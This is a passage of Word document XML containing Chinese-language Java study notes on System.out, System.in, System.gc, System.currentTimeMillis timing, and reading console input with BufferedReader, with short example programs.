      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6BFFA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703B3774" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>System.out.print</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACB472A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.out.println</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5375F0FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAB3F33" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台输入由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> System.in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA47C31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="533D3698" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.gc:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用系统的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>垃圾收集器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E645A67" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AED24EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">public class FinalizationDemo {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE1CD2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  public static void main(String[] args) {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309468C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Cake c1 = new Cake(1);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48844E85" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Cake c2 = new Cake(2);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C50EF3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Cake c3 = new Cake(3);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DB3075" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DECA7A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    c2 = c3 = null;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650A7938" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>System.gc(); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>垃圾收集器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD93D72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72173207" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE71ACB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02FBDF73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="730" w:name="_Toc159780159"/>
      <w:r>
        <w:t>System.currentTimeMillis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测量程序运行时间：单位毫秒</w:t>
      </w:r>
      <w:bookmarkEnd w:id="730"/>
    </w:p>
    <w:p w14:paraId="13B80271" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15425D5B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E042E4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class DiffDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7170E2F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BFF0E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6889995E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>long start = System.currentTimeMillis( );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CDA7FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.println(new Date( ) + "\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B21330" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         Thread.sleep(5*60*10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F96EB76" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.println(new Date( ) + "\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD3E23C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>long end = System.currentTimeMillis( );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9B05DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         long diff = end - start;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683CE90B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.println("Difference is : " + diff);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C52B35" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      } catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E174C6C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.println("Got an exception!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDB9F9B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A86C503" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F40FDC6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B546E2C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="731" w:name="_Toc159780160"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>java.io</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：处理所有输入输出</w:t>
      </w:r>
      <w:bookmarkEnd w:id="731"/>
    </w:p>
    <w:p w14:paraId="41134E46" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Java.io </w:t>
      </w:r>
      <w:r>
        <w:t>包几乎包含了所有操作输入、输出需要的类。所有这些流类代表了输入源和输出目标。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAEA76D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Java.io </w:t>
      </w:r>
      <w:r>
        <w:t>包中的流支持很多种格式，比如：基本类型、对象、本地化字符集等等。应用到文件传输和网络编程中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7359CBD3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="009FE3D0" wp14:editId="10F358BD">
            <wp:extent cx="2693670" cy="2991485"/>
            <wp:effectExtent l="0" t="0" r="3810" b="10795"/>
            <wp:docPr id="3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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId221"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2693670" cy="2991485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ED4594" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取控制台输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67931634" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r>
        <w:t>的控制台输入由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>System.in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C7C81F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>为了获得一个绑定到控制台的字符流，你可以把</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>System.in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>包装在一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>BufferedReader</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>对象中来创建一个字符流。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B551112" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697CC823" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>下面是创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BufferedReader </w:t>
      </w:r>
      <w:r>
        <w:t>的基本语法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7316D66E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>BufferedReader br = new BufferedReader(new InputStreamReader(System.in));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2D337E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BufferedReader </w:t>
      </w:r>
      <w:r>
        <w:t>对象创建后，我们便可以使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> read() </w:t>
      </w:r>
      <w:r>
        <w:t>方法从控制台读取一个字符，或者用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> readLine() </w:t>
      </w:r>
      <w:r>
        <w:t>方法读取一个字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371D5A97" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从控制台读取多字符输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C292952" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BufferedReader </w:t>
      </w:r>
      <w:r>
        <w:t>对象读取一个字符要使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> read() </w:t>
      </w:r>
      <w:r>
        <w:t>方法，它的语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52232028" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="289571A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>int read( ) throws IOException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0834F1D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>每次调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> read() </w:t>
      </w:r>
      <w:r>
        <w:t>方法，它从输入流读取一个字符并把该字符作为整数值返回。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>当流结束的时候返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -1</w:t>
      </w:r>
      <w:r>
        <w:t>。该方法抛出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IOException</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722DF84D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689B9B34" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>下面的程序示范了用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> read() </w:t>
      </w:r>
      <w:r>
        <w:t>方法从控制台不断读取字符直到用户输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> q</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349E1633" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BufferedReader </w:t>
      </w:r>
      <w:r>
        <w:t>在控制台读取字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC6631E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import java.io.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D53F67" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class BRRead {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE3386" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String[] args) throws IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683B851A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>char c;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6E2617" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> System.in </w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BufferedReader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B80C8E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>BufferedReader br = new BufferedReader(new InputStreamReader(System.in));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C69960" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:t>输入字符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>按下</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 'q' </w:t>
      </w:r>
      <w:r>
        <w:t>键退出。</w:t>
      </w:r>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F6C007" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:t>读取字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F31C9AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>do {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3412B283" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            c = (char) br.read();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C571C23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
